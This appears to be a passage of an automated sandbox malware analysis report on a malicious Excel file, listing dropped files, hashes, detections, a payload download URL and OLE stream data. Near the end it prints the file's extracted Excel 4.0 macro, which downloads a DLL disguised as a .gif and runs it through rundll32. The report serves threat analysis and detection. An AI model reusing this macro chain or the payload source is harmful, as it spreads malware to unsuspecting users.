                                        SHA1:C4D99D1B382736FFE3AB08D1252E5DF51834FF5F
                                        SHA-256:B801B877383A6E165445A6DD99B2DFB3FC39BAACB53DC6DFC057C6CDC4AB035E
                                        SHA-512:3DF0CBE88D7B843B8300298585BC5E8E3B7FC64EF0C79A1F7B651057DA86E1997DBDFD11BD1B4B222B2083C23792273A542AD30679563DDBD3A344AF9788EF34
                                        Malicious:false
                                        Preview: p...... ....`...u..O+..(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0702[1].gif
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:downloaded
                                        Size (bytes):701440
                                        Entropy (8bit):6.569729430445502
                                        Encrypted:false
                                        SSDEEP:12288:4OVZl+VL/X2ogyxiVIHOa5sgGSg6dEE9SXrFyoCq:3flS/XkySYL/GSg639SXr9
                                        MD5:0782295F04B54D341792BFA0E4396AA7
                                        SHA1:342875D35F1FA21F6C313BD76DB911BF90953129
                                        SHA-256:63B470971FA827F8E59555C32E966B68EE765120849C23431DD352AEACBBA52B
                                        SHA-512:3F1DE9373CF390AFFE49578A35E5B48C6E8220EA95F85E3A51F81083300869E1E47B79E95D562D6095929FD79712F8D9DFD7D3B17E310A1A1A89541C18B6A3D0
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: Metadefender, Detection: 30%, Browse
                                        • Antivirus: ReversingLabs, Detection: 93%
                                        Joe Sandbox View:
                                        • Filename: contract (39).xls, Detection: malicious, Browse
                                        IE Cache URL:https://tidymasters.com.au/ds/0702.gif
                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................P...`......._.......`....@.................................................................................. ...........................c..................................................................................CODE.....O.......P.................. ..`DATA....(....`.......T..............@...BSS.....5............h...................idata........... ...h..............@....reloc...c.......d..................@..P.rsrc........ ......................@..P....................................@..P........................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\06DE0000
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):304489
                                        Entropy (8bit):7.987681872375293
                                        Encrypted:false
                                        SSDEEP:6144:JerFLPodmRqyAVYtlKsVLCyo7NtbcY7uLaG/9t7+MX:JeFPM8R3AsB+bjej/9co
                                        MD5:8F704F373C6918FC3C81A9DC7D8C2C2D
                                        SHA1:51033750C855A05F0E404B9CAE73EDBC5238B5D0
                                        SHA-256:B6DAB8A2F6B99817F1EF5060AA2778C25C5BD6CBC729D3F94802115ED29465B6
                                        SHA-512:E738F21700DB5DCE8DBC0E7D825C5E60001F008332002EB1266B868C1D4DA352969576912B00CFE8ADA5550404FEFDE5911AF5D8DD58D18102229C42A7DA112E
                                        Malicious:false
                                        Preview: .T.n.0....?..........C....I?`L.%...a...;...5..Fr.B.-..........{q..D.^.m.._......^...{.E........0.S/...)I......*$.._. #.5.(?.f...>..m..b1..+x.........x.|.}W.z.1Z. .Q....H.V+.P........4.....&...s..H....G....e.4"..#..}..#k)4.H.8......9.q?......B.?.qZrc.SH.e...<I..Q......u.T.7...y...vxF."I....H....?.RI%..Q}_j.P...L...e....J3!Hyk..8.......].........>t..bA..^.....O..."..Jxy..^.md"L...O..A....G3..8.Oh.:..........PK..........!.I$ON............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\CabE310.tmp
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                        Category:dropped
                                        Size (bytes):58596
                                        Entropy (8bit):7.995478615012125
                                        Encrypted:true
                                        SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                        MD5:61A03D15CF62612F50B74867090DBE79
                                        SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                        SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                        SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                        Malicious:false
                                        Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                        C:\Users\user\AppData\Local\Temp\TarE311.tmp
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):152788
                                        Entropy (8bit):6.309740459389463
                                        Encrypted:false
                                        SSDEEP:1536:TIz6c7xcjgCyrYBZ5pimp4Ydm6Caku2Dnsz0JD8reJgMnl3rlMGGv:TNqccCymfdmoku2DMykMnNGG0
                                        MD5:4E0487E929ADBBA279FD752E7FB9A5C4
                                        SHA1:2497E03F42D2CBB4F4989E87E541B5BB27643536
                                        SHA-256:AE781E4F9625949F7B8A9445B8901958ADECE7E3B95AF344E2FCB24FE989EEB7
                                        SHA-512:787CBC262570A4FA23FD9C2BA6DA7B0D17609C67C3FD568246F9BEF2A138FA4EBCE2D76D7FD06C3C342B11D6D9BCD875D88C3DC450AE41441B6085B2E5D48C5A
                                        Malicious:false
                                        Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........|h....210303062855Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Apr 7 00:40:40 2021, atime=Wed Apr 7 00:40:40 2021, length=8192, window=hide
                                        Category:dropped
                                        Size (bytes):867
                                        Entropy (8bit):4.491798866881926
                                        Encrypted:false
                                        SSDEEP:12:85Q7qqmcLgXg/XAlCPCHaXtB8XzB/G89UNpX+Wnicvb4+bDtZ3YilMMEpxRljKFs:857ZK/XTd6j4DYelDv3qcrNru/
                                        MD5:D0ACDB5111CD883926D16D5B6B3D1FA9
                                        SHA1:44FDA7C5E6A87B048936036E1C0ED2A0DE270966
                                        SHA-256:5CC0C63AC47E1634E2A3874DB0D393FCBA46FBA323D54E255E71CA13518703DE
                                        SHA-512:5C102D8A55CBD05568F7A6A1CF77C51685B25779BC0C0CF18BE6D58F1AB367C653E316456A8B4725A0FE75179004051E97265E539717CC720E726C3A3EEAFC18
                                        Malicious:false
                                        Preview: L..................F...........7G..+.I.O+..+.I.O+... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\468325\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......468325..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-1055791644.LNK
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Apr 7 00:40:40 2021, atime=Wed Apr 7 00:40:40 2021, length=323072, window=hide
                                        Category:dropped
                                        Size (bytes):4236
                                        Entropy (8bit):4.527464012505557
                                        Encrypted:false
                                        SSDEEP:96:8A/XojFY4cQh2A/XojFY4cQh2A/XojFY4cQh2A/XojFY4cQ/:8djFWQEdjFWQEdjFWQEdjFWQ/
                                        MD5:15A3C28F9DBDB4FBF1A0E954CD5E43CA
                                        SHA1:5046551E661056CB9E645D4225B63FD23EB6647D
                                        SHA-256:406037A2840E8447B83CAEEC4CA6538A06B925CD5E4A9E7C5A7128590A48DE00
                                        SHA-512:7184A2345E442143CE4CF19525CBA2F6B017947C9629D9430E3446C599A2471EC33A431F865C7D8A3898753E739544B730B6AE39C4372639938B949CCF758EA4
                                        Malicious:false
                                        Preview: L..................F.... ...jK.{..+.I.O+..L.Q.O+...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2......R.. .DOCUME~1.XLS..\.......Q.y.Q.y*...8.....................d.o.c.u.m.e.n.t.-.1.0.5.5.7.9.1.6.4.4...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\468325\Users.user\Desktop\document-1055791644.xls.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.1.0.5.5.7.9.1.6.4.4...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......468325..........D_....3N.
                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):232
                                        Entropy (8bit):4.76735872684343
                                        Encrypted:false
                                        SSDEEP:6:dj6Y9LClTHSELClTH6Y9LClTHSELClTH6Y9LClTHSELClTH6Y9LClTHy:dmHc0Hc0Hc0HM
                                        MD5:508259E13350AC4C2097E410C9DA2739
                                        SHA1:0A08626E7D5172AB04DED25AF714B7370E431496
                                        SHA-256:76991574AF6C654CFCC618B4228B0913BCB3F9576E4834DA0FF7AEB5B92030CF
                                        SHA-512:8443458274F513C710376996D90B4E555DEFCBC83D96676D7E8914341BADADE91210016EA417A4F576E4170F047546C4A108EFEA3815C9869AC764C52F39903B
                                        Malicious:false
                                        Preview: Desktop.LNK=0..[xls]..document-1055791644.LNK=0..document-1055791644.LNK=0..[xls]..document-1055791644.LNK=0..document-1055791644.LNK=0..[xls]..document-1055791644.LNK=0..document-1055791644.LNK=0..[xls]..document-1055791644.LNK=0..
                                        C:\Users\user\Desktop\C7DE0000
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:Applesoft BASIC program data, first line number 16
                                        Category:dropped
                                        Size (bytes):359638
                                        Entropy (8bit):7.418188194192143
                                        Encrypted:false
                                        SSDEEP:6144:xcKoSsxzNDZLDZjlbR868O8KL5L+od2xEtjPOtioVjDGUU1qfDlavx+W2QnAFVAI:LeLUIRfUI5uXL6nDJoF7os
                                        MD5:8A3AF2CC1CF26730C18E409488E63CCA
                                        SHA1:7B08720176AD62C6440E25B9DF4181C536502E76
                                        SHA-256:6FAC0F28ADE91347E64507A2A1BD9B56F24E70442D1B3ED34317907DAFA7EA3C
                                        SHA-512:E7485CB5D539795123970ED0B837A6A45D70725B353D8E32B9F9F57645890DEEACCC3F4218568ECE18A40302EC5997E223CB0A66B79E01919146376611330F92
                                        Malicious:false
                                        Preview: ........g2.........................\.p.... B.....a.........=...........................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...............
                                        C:\Users\user\iojhsfgv.dvers
                                        Process:C:\Windows\SysWOW64\explorer.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):701440
                                        Entropy (8bit):0.005573264919806617
                                        Encrypted:false
                                        SSDEEP:6:MxlEh/jKjXFeyclltAx1glItfvlyl/al//xYMXql1lC0lrULsolXQX8eef4f+8Az:OEh/G70yUQx1glnm/anlYlXQX8eFfiX
                                        MD5:DE9EB59161D48BFF791FD7788954E2DA
                                        SHA1:27B7FD5FB1BC5C8A6B64AC83CB631733CF35F99E
                                        SHA-256:9E6B6797944DD3EDD500BC13B5CDF9B74B9AFD215C9BED6EF3BEC26DB4396A7B
                                        SHA-512:0D575BCA4362DB030A68883FA76112A0221ED8D3A4324C4881BBCB4AAFBBDEBDB61542545C612488C3044B823BFCDC17DD1FCF0585D32BCC4784D327FB79986D
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Metadefender, Detection: 5%, Browse
                                        • Antivirus: ReversingLabs, Detection: 11%
                                        Joe Sandbox View:
                                        • Filename: contract (39).xls, Detection: malicious, Browse
                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................P...`......._.......`....@.................................................................................. ...........................c..................................................................................CODE.....O.......P.................. ..`DATA....(....`.......T..............@...BSS.....5............h...................idata........... ...h..............@....reloc...c.......d..................@..P.rsrc........ ......................@..P....................................@..P........................................................................................................................................................................................................................

                                        Static File Info

                                        General

                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Feb 8 08:27:11 2021, Security: 0
                                        Entropy (8bit):7.606120010244409
                                        TrID:
                                        • Microsoft Excel sheet (30009/1) 78.94%
                                        • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                        File name:document-1055791644.xls
                                        File size:323072
                                        MD5:a1b03697f4c155ce81cbe1a4d8f87382
                                        SHA1:c38536b8b88cb657f63a5c3ceb83586bd95f1b4b
                                        SHA256:6083d754351ed13573a015a56de62a51d8755e4ada995406c89abdf5a85e7390
                                        SHA512:9e645189e9ec6e1e6a9faeb34a1c7575de8ec6ae425661b13ee99274b2752013342f46ba69068d18430c9f2354129015be19b59bbc102c66ad60f70c1981530d
                                        SSDEEP:6144:BcKoSsxzNDZLDZjlbR868O8KlVH33dq7uDphYHceXVhca+fMHLty/xcl8OR4PiAK:meLUIRfUI5uXL6nDJofE
                                        File Content Preview:........................>.......................u...........................p...q...r...s...t..................................................................................................................................................................

                                        File Icon

                                        Icon Hash:e4eea286a4b4bcb4

                                        Static OLE Info

                                        General

                                        Document Type:OLE
                                        Number of OLE Files:1

                                        OLE File "document-1055791644.xls"

                                        Indicators

                                        Has Summary Info:True
                                        Application Name:Microsoft Excel
                                        Encrypted Document:False
                                        Contains Word Document Stream:False
                                        Contains Workbook/Book Stream:True
                                        Contains PowerPoint Document Stream:False
                                        Contains Visio Document Stream:False
                                        Contains ObjectPool Stream:
                                        Flash Objects Count:
                                        Contains VBA Macros:True

                                        Summary

                                        Code Page:1251
                                        Author:
                                        Last Saved By:
                                        Create Time:2006-09-16 00:00:00
                                        Last Saved Time:2021-02-08 08:27:11
                                        Creating Application:Microsoft Excel
                                        Security:0

                                        Document Summary

                                        Document Code Page:1251
                                        Thumbnail Scaling Desired:False
                                        Contains Dirty Links:False
                                        Shared Document:False
                                        Changed Hyperlinks:False
                                        Application Version:917504

                                        Streams

                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                        General
                                        Stream Path:\x5DocumentSummaryInformation
                                        File Type:data
                                        Stream Size:4096
                                        Entropy:0.311136915093
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . .
                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 96 00 00 00 02 00 00 00 e3 04 00 00
                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                        General
                                        Stream Path:\x5SummaryInformation
                                        File Type:data
                                        Stream Size:4096
                                        Entropy:0.250980572468
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . 2 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                        Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 311018
                                        General
                                        Stream Path:Workbook
                                        File Type:Applesoft BASIC program data, first line number 16
                                        Stream Size:311018
                                        Entropy:7.73725705111
                                        Base64 Encoded:True
                                        Data ASCII:. . . . . . . . g 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . . .
                                        Data Raw:09 08 10 00 00 06 05 00 67 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                        Macro 4.0 Code

                                        ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AE13(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AA13(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""UR""&AF21,AE19&AE20&AE21&AE22&AE23&AE24&AE25&AE26&AE27&AE28&AE29&AE30&AE31&AE32&AE33&AE34&AE35&AE14,""JJCCBB"",0,A100,AF18,AF23,0)",,,,"=FORMULA.ARRAY(AE17,AE14)","=FORMULA.ARRAY(AH25&AH26&AH27&AH28&AH29&AH30&AH31,AF14)","=FORMULA.ARRAY(AI25&AI26&AI27&AI28&AI29,AG14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,=AB17(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AF13(),=AG13(),=AA10(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AF14&""2 ""&AF18&AG14&""egisterServer"")",,,A,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,..\iojhsfgv.dvers,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,U,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,L,LMon,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,D,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,w,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,n,,,r,",",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,,,u,D,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,,,n,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,a,,,d,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,d,,,l,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,T,,,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,,,3,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,F,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,i,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,e,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,